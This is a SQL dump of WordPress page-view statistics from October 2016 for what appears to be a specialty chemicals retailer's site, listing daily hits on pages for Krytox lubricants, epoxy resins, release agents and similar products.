INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-16', 2, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-16', 2, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-16', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters', '2016-10-16', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-16', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-16', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-16', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-16', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-16', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids', '2016-10-16', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-16', 3, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-16', 1, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents', '2016-10-16', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-16', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/', '2016-10-16', 1, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-16', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-16', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/', '2016-10-16', 2, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-16', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-16', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-16', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-16', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-16', 3, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-16', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-16', 3, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-16', 2, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-16', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-16', 5, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-16', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-16', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-16', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-16', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conductive-coating/', '2016-10-16', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-16', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-16', 1, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-16', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-16', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-16', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-10-16', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-16', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-10-16', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-16', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive', '2016-10-16', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-16', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication', '2016-10-16', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-16', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants', '2016-10-16', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-16', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation', '2016-10-16', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases', '2016-10-16', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-16', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq', '2016-10-16', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-16', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding', '2016-10-16', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants', '2016-10-16', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life', '2016-10-16', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness', '2016-10-16', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant', '2016-10-16', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-16', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-17', 501, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-17', 136, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-17', 17, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-17', 109, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-17', 4, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-17', 11, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-17', 2, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-17', 43, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-17', 3, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-17', 9, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-17', 9, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-17', 12, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-17', 30, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-17', 20, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-17', 13, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-17', 2, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-17', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-17', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-10-17', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-68/', '2016-10-17', 1, 1224); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-68/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1224); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-17', 43, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-17', 2, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-17', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/', '2016-10-17', 3, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-17', 10, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-17', 5, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-17', 28, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-17', 21, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-17', 31, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-17', 8, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-17', 3, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-17', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/', '2016-10-17', 3, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-17', 3, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-17', 2, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-17', 4, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-17', 3, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-17', 3, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-17', 5, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-17', 8, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-17', 4, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-17', 2, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-17', 4, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-17', 6, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-17', 9, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-17', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-17', 3, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-17', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-17', 3, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-17', 3, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/', '2016-10-17', 3, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-17', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-17', 4, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-17', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-17', 2, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-17', 3, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-17', 4, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-10-17', 3, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-17', 2, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-17', 2, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-17', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-17', 2, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-17', 2, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-17', 4, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-17', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-17', 4, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-17', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-17', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-17', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-17', 5, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/', '2016-10-17', 2, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?add_to_wishlist=1292', '2016-10-17', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-17', 3, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-17', 2, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-17', 3, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/high-temperature-release-agent/', '2016-10-17', 1, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?action=register', '2016-10-17', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-17', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-17', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-17', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1007f/', '2016-10-17', 1, 941); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/', '2016-10-17', 3, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/', '2016-10-17', 2, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-110xnb-copy/', '2016-10-17', 1, 1666); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-17', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-17', 3, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-10-17', 1, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-17', 4, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-17', 5, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/?wc-ajax=get_refreshed_fragments', '2016-10-17', 4, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-17', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-17', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-17', 3, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-17', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-17', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-210/', '2016-10-17', 2, 402); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-17', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-17', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/', '2016-10-17', 1, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-17', 3, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/', '2016-10-17', 1, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143aa/', '2016-10-17', 1, 579); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-17', 6, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-su-8/', '2016-10-17', 1, 952); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-su-8/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 952); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-17', 2, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/', '2016-10-17', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-17', 9, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-10-17', 2, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-17', 2, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-17', 3, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/', '2016-10-17', 4, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ad/', '2016-10-17', 1, 656); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/', '2016-10-17', 2, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-10-17', 1, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-17', 1, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-17', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-17', 5, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-10-17', 3, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/', '2016-10-17', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/shutterstock_405633937/', '2016-10-17', 3, 2553); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/shutterstock_405633937/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 2553); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-17', 3, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-10-17', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agent/', '2016-10-17', 1, 293); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-17', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-17', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/', '2016-10-17', 2, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters', '2016-10-17', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-17', 4, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-17', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/', '2016-10-17', 2, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3370/', '2016-10-17', 1, 1061); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3370/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1061); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-17', 2, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-17', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-17', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-17', 2, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-212x/', '2016-10-17', 1, 1638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-212x/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-17', 11, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-17', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-17', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/', '2016-10-17', 1, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-17', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/', '2016-10-17', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-252n/', '2016-10-17', 1, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-17', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/', '2016-10-17', 2, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-17', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/', '2016-10-17', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-acx/', '2016-10-17', 1, 674); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-500/', '2016-10-17', 1, 707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 303); 
